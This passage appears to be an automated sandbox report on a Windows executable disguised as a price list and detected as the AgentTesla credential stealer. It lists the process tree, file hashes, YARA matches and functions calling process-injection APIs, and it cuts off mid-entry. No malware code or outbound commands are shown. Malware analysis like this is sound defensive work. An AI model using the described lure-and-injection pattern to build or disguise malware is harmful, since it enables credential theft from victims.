                                                Start date:23/02/2021
                                                Path:C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe'
                                                Imagebase:0x4e0000
                                                File size:32624 bytes
                                                MD5 hash:404EF05A6ACC67C2B59189171F9EB0FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 5932 Parent PID: 7024

                                                General

                                                Start time:09:58:28
                                                Start date:23/02/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 4540 Parent PID: 5932

                                                General

                                                Start time:09:58:29
                                                Start date:23/02/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: timeout.exe PID: 4852 Parent PID: 5932

                                                General

                                                Start time:09:58:29
                                                Start date:23/02/2021
                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                Wow64 process (32bit):true
                                                Commandline:timeout 1
                                                Imagebase:0x280000
                                                File size:26112 bytes
                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: PRICE LIST (NOVEMBER 2020).exe PID: 1508 Parent PID: 7024

                                                General

                                                Start time:09:58:31
                                                Start date:23/02/2021
                                                Path:C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                Imagebase:0x840000
                                                File size:32624 bytes
                                                MD5 hash:404EF05A6ACC67C2B59189171F9EB0FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: WerFault.exe PID: 6704 Parent PID: 7024

                                                General

                                                Start time:09:58:33
                                                Start date:23/02/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592
                                                Imagebase:0xcc0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: PRICE LIST (NOVEMBER 2020).exe PID: 7024 Parent PID: 5892 PRICE LIST (NOVEMBER 2020).exeCOMMON

                                                  Executed Functions

                                                  Function 027DAE21, Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,027DAD3F,00000000,00000000), ref: 027DAE90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: b8da93c5f3c2b006e97df7f56a581a5109cc1f7a35b3d1969b45d484d3fb7851
                                                  • Instruction ID: 4b4fc176ebcf5e1a5b118f3ebd3bd3dcb5f6d87613dc78179119cd937e811a99
                                                  • Opcode Fuzzy Hash: b8da93c5f3c2b006e97df7f56a581a5109cc1f7a35b3d1969b45d484d3fb7851
                                                  • Instruction Fuzzy Hash: 4F1123B19002489FCB20CF9AC884BDFBBF4FF88324F148459E558A7250C775A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027DA0D0, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,027DAD3F,00000000,00000000), ref: 027DAE90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 545bc279b4c71bdd7eb0de61e1f712e18405084e24899522de413dae195c563d
                                                  • Instruction ID: 545c0000f5a21be48983fda48e0efb6cee263ab88a1df4e87732516549bc420d
                                                  • Opcode Fuzzy Hash: 545bc279b4c71bdd7eb0de61e1f712e18405084e24899522de413dae195c563d
                                                  • Instruction Fuzzy Hash: E31123719042489FCB10DF9AC448BDFBBF4FB88364F108429E559A7310C775A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027DCDD8, Relevance: .9, Instructions: 918COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42cf1f073fdea5747a0abbe53da50f61a62a2a09f6d1428f9e7edc5c25d6d153
                                                  • Instruction ID: 5734e259af73157d317f1b37110af3ea4144d529a89cab73827609c591b26f65
                                                  • Opcode Fuzzy Hash: 42cf1f073fdea5747a0abbe53da50f61a62a2a09f6d1428f9e7edc5c25d6d153
                                                  • Instruction Fuzzy Hash: 2A728F71A002199FCB24DFA9C894AAEBBF6FF89304F158069E506EB365DB31DD41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027D0690, Relevance: .8, Instructions: 752COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56a515848a29b143d0c0def5ffd11dea4d72d023e485ff1863cd6c78742c4bd6
                                                  • Instruction ID: 57964711f13398733611feb67a48f37e497b65cd720e146a61971a8b4cf6bc64
                                                  • Opcode Fuzzy Hash: 56a515848a29b143d0c0def5ffd11dea4d72d023e485ff1863cd6c78742c4bd6
                                                  • Instruction Fuzzy Hash: 7A720834601740DFDB29AF70E45597A37B3FB86308B2048A9E90A5B769CB36DD46CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027D2AD8, Relevance: .7, Instructions: 726COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c55fb0a41901a51109f1a930267196b99b0f58e6b67b7e234b2b37a0f3f8ab01
                                                  • Instruction ID: 773ab20913fadf16ecf6f72d1538a52a094961c26394ef808eaa35a58cf20a0e
                                                  • Opcode Fuzzy Hash: c55fb0a41901a51109f1a930267196b99b0f58e6b67b7e234b2b37a0f3f8ab01
                                                  • Instruction Fuzzy Hash: F7528F30B001159FCB18DF69C984A6EB7B2BF89714B1581A9E916EB365DF31EC02CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027D5BE1, Relevance: .6, Instructions: 550COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0cdcdca15699e011cc48b4c29baaa1d4fca01d03150d170965e0a978986a385e
                                                  • Instruction ID: cc669eac2e9542b6f147bebc309489739ee2c3622339c6d1f4b1e823385d7621
                                                  • Opcode Fuzzy Hash: 0cdcdca15699e011cc48b4c29baaa1d4fca01d03150d170965e0a978986a385e
                                                  • Instruction Fuzzy Hash: AA42D874A042288FCB64DF64C895A9DB7B2FF89304F1181E9E50AA7764DF31AE81CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027D6E48, Relevance: .3, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a9f41d37ced2fc1865aa27b53a3b89bf3d5f38f7766739318e44406fbbf3a94
                                                  • Instruction ID: 24fcaa100d19ebc8531f7d7064bc0f6790100f585eadcb8f9373869aa160bed1
                                                  • Opcode Fuzzy Hash: 6a9f41d37ced2fc1865aa27b53a3b89bf3d5f38f7766739318e44406fbbf3a94
                                                  • Instruction Fuzzy Hash: 58C17074A003448FDB14EFB4D8596ADBBF2AF45308F1444ADE8169B3A6DF3A8D44CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 027D1BE9, Relevance: .1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f22343b3220122d5fa24a6d11478f118de03a8b4593d25b46203f116dfafeb00
                                                  • Instruction ID: ce8134fa27dc69799684269e63eafb00bc093ef271e1a8907d6b1b9a43470790
                                                  • Opcode Fuzzy Hash: f22343b3220122d5fa24a6d11478f118de03a8b4593d25b46203f116dfafeb00
                                                  • Instruction Fuzzy Hash: EB51FA353017808FCB797B3094554BE3B63EB9665831048BEEC4B8BBA5CF3BD8458A91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D3634, Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068D3876
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 77040104297e41a9174e637c639729f868047302f3489901689772e341120c2c
                                                  • Instruction ID: 470830bbc704f3f26d040b43c42ca425ccebff26b14af794ce19cc0c6cf2d983
                                                  • Opcode Fuzzy Hash: 77040104297e41a9174e637c639729f868047302f3489901689772e341120c2c
                                                  • Instruction Fuzzy Hash: 54A17971D00659DFDB50CF68C841BEEBBB2BF49314F048569E909E7240DB749A85CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D3640, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068D3876
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 97542d048a80ab479c0569a90da320d19a811f02674bcacbcad03313bc1f959f
                                                  • Instruction ID: 81e1b3d0b4d2d0f197da0e207ccc82995a0470db2d44f00b9c8aa4186e704f87
                                                  • Opcode Fuzzy Hash: 97542d048a80ab479c0569a90da320d19a811f02674bcacbcad03313bc1f959f
                                                  • Instruction Fuzzy Hash: 1A917871D00659DFDB50CF68C841BEEBBB2BF49314F048569E909E7240DB749A85CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D4B20, Relevance: 1.7, APIs: 1, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 068D4B89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 46310fb6c5884a561f402e0f8bfbe07c54e6e61e4b587d4587e3d918d20d997d
                                                  • Instruction ID: 98b3ae1224d209ba54c7495ffa6f59098c9d4f791a7aabb8be20bcc8cd246eaf
                                                  • Opcode Fuzzy Hash: 46310fb6c5884a561f402e0f8bfbe07c54e6e61e4b587d4587e3d918d20d997d
                                                  • Instruction Fuzzy Hash: 8DA12670E002099BDB58DFA9D499BEDFBF2BF89324F188118D011EB391D7749849CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D2DB0, Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068D2E48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: d4125afdf9ed82b9201c98813f7d09a94bc70aa19374bc9a0f08e13e2bca8212
                                                  • Instruction ID: 397df9d515f2e54ce10ea878be58711e06be244b03412a8a5e44a698beca17a6
                                                  • Opcode Fuzzy Hash: d4125afdf9ed82b9201c98813f7d09a94bc70aa19374bc9a0f08e13e2bca8212
                                                  • Instruction Fuzzy Hash: 3E2126719003499FCB50CFA9C884BEEBBF5FF48314F14842AEA58A7241C7749955CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D2DB8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068D2E48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 6d32871f38dc9d955f0b83c10e6290678e174fcfa71e77c2545375fcf64a6e5a
                                                  • Instruction ID: 59f663b62bc5e0f6d5e718744e6ee185037f74f51bcfb044f3a7023cf49c85b6
                                                  • Opcode Fuzzy Hash: 6d32871f38dc9d955f0b83c10e6290678e174fcfa71e77c2545375fcf64a6e5a
                                                  • Instruction Fuzzy Hash: D72115719003499FCB50CFA9C884BEEBBF5FF48314F048429EA19A7240D7789955CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D1E10, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 068D1E96
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 71e52154e67ee84d79a55e3e9eaeeedfad9acdb85d512dd53c256b097d4ad31c
                                                  • Instruction ID: 19535696208ded80ab0c8d9eb23c6c3d6e81257511fa4dd431f83de8d052435a
                                                  • Opcode Fuzzy Hash: 71e52154e67ee84d79a55e3e9eaeeedfad9acdb85d512dd53c256b097d4ad31c
                                                  • Instruction Fuzzy Hash: 82214571D002489FDB50DFAAC4847EEBBF4AF48254F148429E599B7640CB78A985CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D30A2, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 068D3128
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 8078b9162039430d425559eb3e1393e8c177feaccb3e9b2f6bd4f5fa81de085d
                                                  • Instruction ID: f2e22b2c1b08d70f46fb5f5a7ac8f8e6bff6e936ee75865ad686ce15d76409a2
                                                  • Opcode Fuzzy Hash: 8078b9162039430d425559eb3e1393e8c177feaccb3e9b2f6bd4f5fa81de085d
                                                  • Instruction Fuzzy Hash: 4F2124719002499FCF10CFAAC880AEEBBF5FF48314F54842AE958A7240DB349944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D30A8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 068D3128
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c3a51c391fbea4b88ad93fc18ab587dd405746b27e34133938f7b0e2e64eb32e
                                                  • Instruction ID: 63b14405f22343e823296c5e1d59696bf6a009d1eae02fb2d3236b1bf2e50fd0
                                                  • Opcode Fuzzy Hash: c3a51c391fbea4b88ad93fc18ab587dd405746b27e34133938f7b0e2e64eb32e
                                                  • Instruction Fuzzy Hash: 1D21E4719003499FCF10DFAAC884AEEBBB5FF48314F54842AE919A7640DB789944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D1E18, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 068D1E96
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: a3167f2d4e874e95613afbffc22d3cc57ae210125a7dde9aa50038d56ddee498
                                                  • Instruction ID: ca737c5c03bfac952e731bba2e573631df8d62eb821dc26b4a6cadc6cd2c81d2
                                                  • Opcode Fuzzy Hash: a3167f2d4e874e95613afbffc22d3cc57ae210125a7dde9aa50038d56ddee498
                                                  • Instruction Fuzzy Hash: A1213471D002088FDB50DFAAC4847EEBBF4AF88264F14842AD559A7640CB78A948CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D4A60, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 068D4ADE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: KernelObjectSecurity
                                                  • String ID:
                                                  • API String ID: 3015937269-0
                                                  • Opcode ID: 54a38c700a62f3bbaf20ea3887722a8206ba2872982a100823f8c6653bd8fc9d
                                                  • Instruction ID: a0fe0ffec27953d1e2fccbac7d7c4f6821d268fcd196921b819ccfd74aefccbc
                                                  • Opcode Fuzzy Hash: 54a38c700a62f3bbaf20ea3887722a8206ba2872982a100823f8c6653bd8fc9d
                                                  • Instruction Fuzzy Hash: B92115B19002499FCB10CF9AC485BEEBBF4EB88364F148429E519B7740DB78A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D2AF0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 068D2B66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: fb54a6a5eda0c1dfb373c39ccf90f9c89048c487487504a0936b2d60108423b2
                                                  • Instruction ID: bba1cb1ef47a1699f9eef7760402d1d44298bf1cf6e53744e25bf9ad89a9da73
                                                  • Opcode Fuzzy Hash: fb54a6a5eda0c1dfb373c39ccf90f9c89048c487487504a0936b2d60108423b2
                                                  • Instruction Fuzzy Hash: E5111475900248DFCB10DFAAC844BEEBBF5EF88324F148819EA55A7650CB75A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D2AF8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 068D2B66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 951eab8d549e06988ef3df85c9e99589088420bd7787dd646b4c29af101f9da4
                                                  • Instruction ID: 81eb30e50fe88906146ac853a60e2880b738bddf1799f98e8630785789da9ae6
                                                  • Opcode Fuzzy Hash: 951eab8d549e06988ef3df85c9e99589088420bd7787dd646b4c29af101f9da4
                                                  • Instruction Fuzzy Hash: F511F3719002499BCF10DFAAC844BEFBBF5AF88324F148819E615A7650CB75A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D3C12, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 45f53927f2f0710cab98c0f822ba39f8b96a98639fb23a89d91c7b4238c39893
                                                  • Instruction ID: 86d2c11978265c56c617c1ea64c3eb333145263d232e85335232a83a0eb60628
                                                  • Opcode Fuzzy Hash: 45f53927f2f0710cab98c0f822ba39f8b96a98639fb23a89d91c7b4238c39893
                                                  • Instruction Fuzzy Hash: ED1146B1D043888BCB20DFAAC8447EEFBF5AF89328F148419D559B7600CB75A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 068D3C18, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 8cdaf12840968597fb554461cfc5d386126e04d10a24810d36c54368dd79fc1d
                                                  • Instruction ID: a55ea6a1f0a5b8aef2373846758dca26f27ad4333e474f9aeb47bb06dbe92f36
                                                  • Opcode Fuzzy Hash: 8cdaf12840968597fb554461cfc5d386126e04d10a24810d36c54368dd79fc1d
                                                  • Instruction Fuzzy Hash: 251125B1D003488BCB10DFAAC4447EEFBF5AB88228F148419D519B7640CB74A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: PRICE LIST (NOVEMBER 2020).exe PID: 1508 Parent PID: 7024 PRICE LIST (NOVEMBER 2020).exeCOMMON

                                                  Executed Functions

                                                  Function 00F8691F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00F869A0
                                                  • GetCurrentThread.KERNEL32 ref: 00F869DD
                                                  • GetCurrentProcess.KERNEL32 ref: 00F86A1A
                                                  • GetCurrentThreadId.KERNEL32 ref: 00F86A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: -h
                                                  • API String ID: 2063062207-250283842
                                                  • Opcode ID: d387066da0db7163a8628f247ff7e487ce13dc906b8204c91250de17c5ded9b7
                                                  • Instruction ID: 90c86653d30733f58ac95fa868e9def8067e2e6c9a5f7c812fc1043d39fa4a16
                                                  • Opcode Fuzzy Hash: d387066da0db7163a8628f247ff7e487ce13dc906b8204c91250de17c5ded9b7
                                                  • Instruction Fuzzy Hash: 5E5166B09053858FDB50DFA9C6487DEBBF0EF49314F20849AE549A7261CB749885CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F86940, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00F869A0
                                                  • GetCurrentThread.KERNEL32 ref: 00F869DD
                                                  • GetCurrentProcess.KERNEL32 ref: 00F86A1A
                                                  • GetCurrentThreadId.KERNEL32 ref: 00F86A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: -h
                                                  • API String ID: 2063062207-250283842
                                                  • Opcode ID: 2d97c16d3e8601de4a0807408cf56b928984eae13e99fb020b3abd2a29cf8484
                                                  • Instruction ID: d91460b76593a1d1b01654f49313a61814054235384bf4a1e6c2b39e300f485b
                                                  • Opcode Fuzzy Hash: 2d97c16d3e8601de4a0807408cf56b928984eae13e99fb020b3abd2a29cf8484
                                                  • Instruction Fuzzy Hash: B55134B0A006498FDB54DFA9C648BDEBBF1EB88314F208499E509B7350DB789984CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F85084, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00F851A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: -h$-h
                                                  • API String ID: 716092398-2479992367
                                                  • Opcode ID: 6a9d23cd0068d2f88e4e96dc27cf8b84614fb31c2cb55db1b98efe0c6dc01bb0
                                                  • Instruction ID: 571bd8e4a51c1552f81a380bdd2879b1fb7c72682a4572429163ff5fdf3d1639
                                                  • Opcode Fuzzy Hash: 6a9d23cd0068d2f88e4e96dc27cf8b84614fb31c2cb55db1b98efe0c6dc01bb0
                                                  • Instruction Fuzzy Hash: E951CEB1D106499FDF14CFA9C884ADEFBB1BF48314F64812AE819AB210D775A985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F85090, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00F851A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: -h$-h
                                                  • API String ID: 716092398-2479992367
                                                  • Opcode ID: b8d5b34ad55275fcd4ff7aada121bb0a05aea2b57f0b9eeebe0090bf9cfedc47
                                                  • Instruction ID: 6144b246e01c7c25de3d630896b14c0c3bcc5d795b5bbb339322ab8880a1a1dd
